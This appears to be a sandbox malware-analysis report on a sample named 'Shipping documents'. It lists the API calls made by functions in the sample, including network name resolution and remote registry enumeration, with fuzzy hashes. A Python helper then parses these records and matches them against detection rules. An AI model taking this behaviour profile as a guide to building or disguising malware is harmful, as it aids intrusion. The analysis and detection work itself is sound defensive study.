                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                          • String ID: KERNEL32.DLL$pI
                                                                                                          • API String ID: 637971194-197072765
                                                                                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1938898002-0
                                                                                                          • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                          • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                                                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                          APIs
                                                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                          • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                                                          • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 3771399671-0
                                                                                                          • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                          • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                                          • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                          • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                          • _memmove.LIBCMT ref: 0044B555
                                                                                                          • _memmove.LIBCMT ref: 0044B578
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2737351978-0
                                                                                                          • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                          • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                                                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                          APIs
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                          • __calloc_crt.LIBCMT ref: 00415246
                                                                                                          • __getptd.LIBCMT ref: 00415253
                                                                                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                          • _free.LIBCMT ref: 0041529E
                                                                                                          • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3638380555-0
                                                                                                          • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                          • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                          • API String ID: 3207048006-625585964
                                                                                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                          APIs
                                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                          • _memmove.LIBCMT ref: 004656CA
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                          • WSACleanup.WSOCK32 ref: 00465762
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                          • String ID:
                                                                                                          • API String ID: 2945290962-0
                                                                                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15295421-0
                                                                                                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                          • String ID: X
                                                                                                          • API String ID: 780548581-3081909835
                                                                                                          • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                                                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                          • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                                                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                          APIs
                                                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                          • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                          • String ID:
                                                                                                          • API String ID: 4082120231-0
                                                                                                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2027346449-0
                                                                                                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
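The function records above (the Winsock name-resolution routine at 00465559, the lone RegConnectRegistryW call at 0046B799, and the RegConnectRegistryW/RegOpenKeyExW/RegEnumValueW routine at 0046B3A6) are easier to triage when the API lists are pulled out of the report text and matched against API-set rules. The following triage helper is an added example and not Joe Sandbox's own code. It parses the plain-text "APIs" / "Similarity" blocks as they appear on this page, records each function's direct calls in address order together with its Instruction Fuzzy Hash and API String ID, and flags records whose direct calls cover a rule. The rule labels, the `FunctionRecord` class and the abbreviated sample text (three records copied from this section) are this example's own constructs; the sample omits the Memory Dump Source lines, which the parser ignores anyway.

```python
# Added triage helper (not Joe Sandbox's own code): parses the plain-text
# function records in this report, extracts each function's direct API calls
# in address order plus its Instruction Fuzzy Hash, and matches API-set rules.
import re
from dataclasses import dataclass, field


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # (address, api name, module) direct calls
    subcalls: list = field(default_factory=list)  # api names reached via 'Part of subcall function'
    fuzzy_hash: str = ""
    api_string_id: str = ""

    @property
    def start(self):
        """Lowest direct-call address, used as the function's label."""
        return min((a for a, _, _ in self.apis), default=None)


API_LINE = re.compile(r"^\s*•\s*(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)")
SUBCALL_LINE = re.compile(r"^\s*•\s*Part of subcall function [0-9A-F]{8}:\s*(?P<name>[A-Za-z_]\w*)\.")
REF = re.compile(r"ref:\s*(?P<addr>[0-9A-F]{8})")
FUZZY = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:\s*(?P<h>[0-9A-F]+)")
API_STRING_ID = re.compile(r"^\s*•\s*API String ID:\s*(?P<id>\d+-\d+)")


def parse_records(text):
    """Split the report text on 'APIs' headers; one FunctionRecord per block."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is not None:
            if m := SUBCALL_LINE.match(line):
                current.subcalls.append(m.group("name"))
            elif m := API_LINE.match(line):
                ref = REF.search(line)
                addr = int(ref.group("addr"), 16) if ref else 0
                current.apis.append((addr, m.group("name"), m.group("module")))
            elif m := FUZZY.match(line):
                current.fuzzy_hash = m.group("h")
            elif m := API_STRING_ID.match(line):
                current.api_string_id = m.group("id")
    for r in records:
        r.apis.sort()  # the report lists calls by address, so this is call order
    return records


def api_sequence(record):
    """Direct API names in call-address order, e.g. as a starting point for a detection rule."""
    return [name for _, name, _ in record.apis]


# Constructed rules: labels are this example's own, not Joe Sandbox signatures.
RULES = {
    "remote registry value enumeration": {"RegConnectRegistryW", "RegOpenKeyExW", "RegEnumValueW"},
    "Winsock hostname resolution": {"WSAStartup", "gethostbyname", "WSACleanup"},
}


def match_rules(records, rules=RULES):
    """[(start address, fuzzy hash, [labels])] for records whose direct calls cover a rule."""
    hits = []
    for r in records:
        called = {name for _, name, _ in r.apis}
        labels = [label for label, needed in rules.items() if needed <= called]
        if labels:
            hits.append((r.start, r.fuzzy_hash, labels))
    return sorted(hits)


# Constructed sample: three abbreviated records copied from this report.
SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00465559
• inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
• gethostbyname.WSOCK32(?), ref: 004655A6
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
• _memmove.LIBCMT ref: 004656CA
• GlobalFree.KERNEL32(00000000), ref: 0046575C
• WSACleanup.WSOCK32 ref: 00465762
Similarity
• API String ID: 2945290962-0
• Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
Similarity
• API String ID: 2027346449-0
• Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
Similarity
• API String ID: 15295421-0
• Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
"""

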